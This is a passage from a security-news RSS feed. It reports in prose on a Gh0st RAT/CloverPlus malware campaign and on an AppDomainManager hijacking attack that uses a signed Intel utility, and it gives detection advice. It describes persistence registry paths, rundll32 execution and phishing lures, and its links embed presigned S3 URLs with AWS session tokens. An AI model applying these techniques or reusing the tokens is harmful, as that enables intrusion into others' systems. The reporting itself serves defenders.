SuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p>Once the adware is handled, the loader checks whether its own file path is located inside the system&#8217;s %temp% folder. </p>



<p>If it is not, it drops a copy of itself there before moving to the next step: decrypting the Gh0st RAT client module, which is stored as an encrypted resource in the RSRC section of the malware binary. </p>



<p>After decryption, the malware generates a random file name and saves the decoded DLL to a randomly named folder at the root of the C:\ drive.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_dYP4mULBlAQ2QohqSxZGOYrHpt0UGfGdu-BJSOQKcx_7sT7997G8JUD07LxdeGF027G-r6CuXO48qxqHK_UecjF9RYCo0tiyVIYVeDRN6UxX-G08yUNTnB14j5PGG7H5V5wo97QOFYxUSbvU2yL5PYtUHE_bd_0BrYux7WzLprX_MxZEi4jLqprJNO4/s16000/The%20Decryption%20and%20Execution%20of%20Gh0st%20RAT%20Payload%20(Source%20-%20Splunk).webp" alt="The Decryption and Execution of Gh0st RAT Payload (Source - Splunk)" /><figcaption class="wp-element-caption">The Decryption and Execution of Gh0st RAT Payload (Source &#8211; Splunk)</figcaption></figure>
</div>


<p>The decrypted DLL is then launched using the legitimate Windows application rundll32.exe, as shown in Figure 03: Rundll32 Execution. This technique allows the malware to execute code under a trusted system process, reducing the chance of triggering standard security alerts. </p>



<p>Once active, Gh0st RAT begins gathering system information, including the machine&#8217;s MAC address and hardware drive serial number, to uniquely identify the infected host within the attacker&#8217;s command-and-control (C2) infrastructure.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p>To stay on the system after a reboot, Gh0st RAT uses multiple persistence methods. It writes itself to the Windows Run registry key and also registers a malicious DLL as part of the Windows Remote Access service under SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_2xCSEROWPtExRdsVAJWk7iQO5_oONIiUXlK4OJOYw52sWStJIUhfd1o-vdFnkshzteFehAv0bS2sKD4oJMtsd_jKKyzn4ocjTBCeQuiRHk_bNXL9qHewDz8BhLhRqO12rJ28DFbb1rmZcbSr6-otSX4XmlAd2Ltt_iA24-rOnm_6H6R90Qqw1NH6EPk/s16000/Remote%20Services%20Persistence%20(Source%20-%20Splunk).webp" alt="Remote Services Persistence (Source - Splunk)" /><figcaption class="wp-element-caption">Remote Services Persistence (Source &#8211; Splunk)</figcaption></figure>
</div>


<p>This gives it SYSTEM-level privileges every time the service starts, without requiring any action from the user.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/587b9e72-6585-4ab6-87df-1ef83d103e98/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.pdf?AWSAccessKeyId=ASIA2F3EMEYEZ75QI5BS&amp;Signature=ycoWgRO6Bv0M9e9XZo0JO87RirI%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFwaCXVzLWVhc3QtMSJHMEUCIQD3Qdz7cweEbPPBr1wyfouBfsASr0IMjsPSwj4ho2OlIQIgDnb7NjPvfaE96WAkOLpzyzMBtlvCCQWL8JwwH%2FNrzW0q8wQIJBABGgw2OTk3NTMzMDk3MDUiDBPWBiHYVO%2FswM4rNirQBEgPRgyWuIk15Q%2FBybr73WQkF23GfEY42f%2F7cdHnyCAk97gEzgQV9o8sfsvbF5PJcj2PdHFQaWg3%2FFnDqszm2HFNyjvFWo8f%2BSRk%2FPIG%2BrycivqWOj22wq8V3%2FYLjSwaV3doRfarHtbQBuNX8Gb9CTXIHQuyBxc16XDquURNKaMzuj5bjz%2Fv20PBcHbGrDSNchvnhCV9cSRGA1lbHL2Qcr0ntJCVZRWYU%2BLIwNGuPeNnQ1In%2FFwQUIGlyGV4hHynx1NBesZRUAQ2XMSc7viQCHrFbmHXJrcOY7GZxI2zrOlNxkj2vu%2BAe7Z4orHG1WllA1Yyv73dkxcslCmvXde3WB6dmwnYxtHt%2BtlcUwGwbTa1LAxqIBUlWXtujygmRKC1xS4SZ%2Bh33F6B4q9VqT1AJkBLGgEFx5J9WxJ3q2xc8unNoCml07iQ9cqhtzJjUnjatCvLz%2F7IJhkTshnVanV7sCkU5NjQF%2Bp2gqhvgWwhOY7Nk1O5l9hdzolnQL22A3eTS11S9oOh6rVVgw1swvGpQXJEfrzcChcdyqA4IxsKyGRSrd7m9Jwb5626E7nbjK6SxcccSCqd5olhztIAjV8li3O3aWtfuN11wZG2iDKZMGZH%2BuaqoujnmjBA5hruEtl%2FXJXWxhzUycpbDeJINjGhb36LpTlr6HatmPN8hSSAgPxA2hVQBjSYhRQ23unZCxChqQv1ih6MOsrG1IZGglk0HsK4jXmhV2M3AKyFif40K6AVjD6CO4o1W0ICMpMF1LZQcmi4t79Ft9myXoZ%2BQjuIOJkwifeZzwY6mAEmTgZFP%2B%2F7T8gtxarLSuSDFuvBQWcPGeA1S9grdvh62wnvDNPejtlCHbgbv0mCrh76RxjxZXgKsKtatJsZmJs2AFfJhtRubj7UmpWG8ASvy0ETfd7RK10YfWd%2FpNiXPiQTjXpSfx6pZPKi7%2Beh0UpaflCzPRluZSrR9awfIwpuLFGsTwN7WzBpPaZPtgqH3wy0MgYyPccHTw%3D%3D&amp;Expires=1776714495" target="_blank" rel="noreferrer noopener"></a></p>



<p><a href="https://cybersecuritynews.com/security-teams-shrink-as-automation-rises/" id="100650" target="_blank" rel="noreferrer noopener">Security teams</a> should monitor for rundll32.exe loading non-standard file extensions from unusual directories. Endpoint tools should flag any process execution originating from the %temp% folder. </p>



<p>Registry modifications to Run keys and RemoteAccess service paths should trigger immediate alerts. Organizations should also watch for ping-based execution delays, which this malware uses to evade sandbox analysis. </p>



<p><a href="https://cybersecuritynews.com/android-bug-leaks-dns-traffic/" id="63789" target="_blank" rel="noreferrer noopener">DNS traffic</a> anomalies and unexpected changes to the system hosts file can also indicate an active Gh0st RAT infection. Keeping endpoint detection rules updated and aligned with MITRE ATT&amp;CK techniques T1134, T1033, T1070.004, T1547.001, T1021, T1543.003, T1056.001, and T1071.004 is strongly advised.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> to Get More Instant Updates</strong>, <strong>Set CSN as a Preferred Source in <a href="https://www.google.com/preferences/source?q=cybersecuritynews.com" target="_blank" rel="noreferrer noopener nofollow">Google</a>.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/gh0st-rat-and-cloverplus-adware-delivered-together/">Gh0st RAT and CloverPlus Adware Delivered Together in New Dual-Payload Malware Campaign</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/Gh0st-RAT-and-CloverPlus-Adware-Delivered-Together-in-New-Dual-Payload-Malware-Campaign.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147986</post-id>	</item>
		<item>
		<title>Hackers Use AppDomain Hijacking to Turn Trusted Intel Utility Into Malware Launcher</title>
		<link>https://cybersecuritynews.com/hackers-use-appdomain-hijacking/</link>
		
		<dc:creator><![CDATA[Tushar Subhra Dutta]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 20:31:23 +0000</pubDate>
				<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Threats]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147985</guid>

					<description><![CDATA[<p>Security researchers have uncovered a highly sophisticated attack campaign that weaponizes a legitimate, digitally signed Intel utility to secretly deploy malware, all without touching a single line of the original program&#8217;s code. The campaign, dubbed Operation PhantomCLR, represents a serious evolution in how advanced attackers hide inside trusted systems to avoid detection. The attack exploits a [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/hackers-use-appdomain-hijacking/">Hackers Use AppDomain Hijacking to Turn Trusted Intel Utility Into Malware Launcher</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Security researchers have uncovered a highly sophisticated attack campaign that weaponizes a legitimate, digitally signed Intel utility to secretly deploy malware, all without touching a single line of the original program&#8217;s code. </p>



<p>The campaign, dubbed Operation PhantomCLR, represents a serious evolution in how advanced attackers hide inside trusted systems to avoid detection.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<p>The attack exploits a feature built into Microsoft&#8217;s .NET runtime called the AppDomainManager mechanism. When a .NET application starts up, the runtime automatically looks for a configuration file in the same folder as the executable. </p>



<p>Attackers have figured out how to abuse this behavior by placing a weaponized configuration file next to a legitimate Intel binary called IAStorHelp.exe, a real, signed Intel storage utility. </p>



<p>By doing so, the malicious code runs first, before the Intel program even begins its normal operations, making it almost invisible to traditional security tools.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<p>Organizations in the Middle East and EMEA financial sectors are the primary targets of this operation. Attackers gain initial access through spear-phishing emails carrying a malicious ZIP archive. </p>



<p>Inside the archive is what appears to be a work-from-home policy PDF document from a Saudi government Ministry. </p>



<p>The file is actually a disguised shortcut (.pdf.lnk) that, once clicked, silently launches the Intel binary and triggers the entire attack chain in the background, while the decoy document opens on screen to avoid suspicion.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<p><a href="https://www.cyfirma.com/research/operation-phantomclr-stealth-execution-via-appdomain-hijacking-and-in-memory-net-abuse/" id="https://www.cyfirma.com/research/operation-phantomclr-stealth-execution-via-appdomain-hijacking-and-in-memory-net-abuse/" target="_blank" rel="noreferrer noopener nofollow">Cyfirma researchers identified and analyzed this framework</a> following continuous monitoring of evolving threats targeting enterprise environments. </p>



<p>Their investigation revealed a multi-stage post-exploitation framework with capabilities comparable to mature offensive toolkits such as Cobalt Strike and Brute Ratel C4, yet without clear direct attribution to a known threat actor. </p>



<p>The level of design discipline, modular architecture, and anti-forensic techniques observed indicate the work of a well-resourced and operationally experienced group. </p>



<p>Once the attacker gains control, they have full remote access to the compromised system, including the ability to steal credentials, financial records, and intellectual property.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<p>The broader risk to organizations is severe. Because the malware runs entirely inside a trusted, signed process, most endpoint detection and antivirus tools will not flag it. </p>



<p>Command-and-control communications are routed through Amazon CloudFront CDN infrastructure using a technique called domain fronting, which makes the <a href="https://cybersecuritynews.com/detecting-malicious-http-traffic/" id="42355" target="_blank" rel="noreferrer noopener">malicious traffic</a> look like normal cloud service activity. </p>



<p>Any system where this framework is active should be treated as fully compromised, with the strong likelihood that the attacker has already moved laterally through the network and may have domain-level access.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/19735d0a-c6d6-4bc0-b9cf-b388ae228622/Hackers-Use-AppDomain-Hijacking-to-Turn-Trusted-Intel-Utility-Into-Malware-Launcher.pdf?AWSAccessKeyId=ASIA2F3EMEYESPMOWN4N&amp;Signature=rEnMQQFSLFgurQVcgG1ScTcWQs4%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFsaCXVzLWVhc3QtMSJGMEQCIHGjJyWutrb8buQSwV1Tf9hMmk4zeh5CheH0BvS0wWZ4AiBz4ZfF%2F8GOrpGxhJXn7LbwHhPPk56Wpg5fNcZQ63EEayrzBAgkEAEaDDY5OTc1MzMwOTcwNSIM4mKVp5TfroQBVmc8KtAEb4Xfw6qKbAF6fdy1C1qZ0D697tRBJ9ty6USuFDmoLshqak0xZXKFuM0vmB8qqTvTziAJ3fp9gddvt7%2BqXX%2FHxFDtc4XNpYRnXj6DJky2nvuiHAPqgaymV78D3%2BHvHzV3zpOrZom7mPM7inNrp7tBmvIXGHRkpZ88%2F7vrgtEOdxcETq6Dlz6BCfgC0z3EpKQ69W6UOZcFnAdMs9uXqkxXHHspzTG1V5bEOOdcXoeFEDSAqZMahv0RLx3yE20znetf%2Bl09PcGyyrk38hdMbYkFUDa7Gp%2Fl3dem6o70AvYn9LkhCwYqFnSmalsRM6skcP87hB1CY4zzaZb9fEiEiHkgygC8mnoyALqXcYRg4lQsZZLDxErVWlRtF0HzOPaDILTuTS8RjLJhroB%2FIP%2Bl6oBTw0urlGzXl7w9%2FzmdDzZYqw0CtmkhBuITsEBZn%2BJ7b1TtZEBmr3VsJsD0KgB0PdnzDE%2Ft88IoUaQNXyRsGswLBVaIxgnkSicH6tB3etThWNCc7vKyzjf7HC3N6H%2BgSGcj803nf%2FLtShnK1KsmdA6T8DtPYi4uXxI9jhPZr4tIVrWFLTkFELIbnzu3%2BQwomWNw6VD%2BBdFzHf2Cqt8wSQUdvP%2Bj7vMoQ0kAmsQU788Vg6GIFKAc3QbFgpDcvK8unI05FlR3G9ITKREdayd2ZkuuQjpPKyIl1TGSN%2FXPQFhqDGDQJyQ5xPgE8uz4Ff9buE5ZLpJORJOSAbtoHm%2FNZ8zLXTgj6ovoB3%2FNv%2BymnVP3i8X0K9NNbJEu1GoE9HJkqF0rNTDn3pnPBjqZAXFOg8LStsQKbcZHrfpWriJ7N2%2FTN9ccQs%2BDf55%2BmdZQNR1GRsGlJ8MrPI5W507YVvoGwnT1%2B12AHg8rQa670yxxoMCgR9BYC30aLyWRkuy5OuWIaaiDgsyJSzpVZqHP2z6jOkIRY0CceHlILgBq6sBgn%2Bzy%2FpsflBB4MCQpY8CReMO7VcQZnE8l2rcF5946wgUfcDiQJioCKw%3D%3D&amp;Expires=1776712601" target="_blank" rel="noreferrer noopener"></a></p>



<h2 class="wp-block-heading" id="how-the-infection-works"><strong>How the Infection Works</strong></h2>



<p>The infection follows six well-engineered stages, each designed to bypass a specific layer of enterprise security. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIEatHXD5OUQpQtb5U1wJNhMRi9e7uJPq7cjm7JcKUY4xqoMTEYB6tSm9XJ7SmDsMQOeDe3bcv5RGZuGrxLdvqAVI_V8ZP0ztODgQ-UFHSgxC0Xe0r2HMGkInBuS7X6x1zoBbEpuQrgJlPtmtK5A52uIRgQ7rrz_Fksjo82FNbwjIpz75yUfXzrnbrzHk/s16000/ZIP%20Archive%20Contents%20(Source%20-%20Cyfirma).webp" alt="ZIP Archive Contents (Source - Cyfirma)" /><figcaption class="wp-element-caption">ZIP Archive Contents (Source &#8211; Cyfirma)</figcaption></figure>
</div>


<p>It starts with the spear-phishing ZIP delivery, then moves to the victim executing the disguised shortcut file. </p>


<div class="wp-block-image">
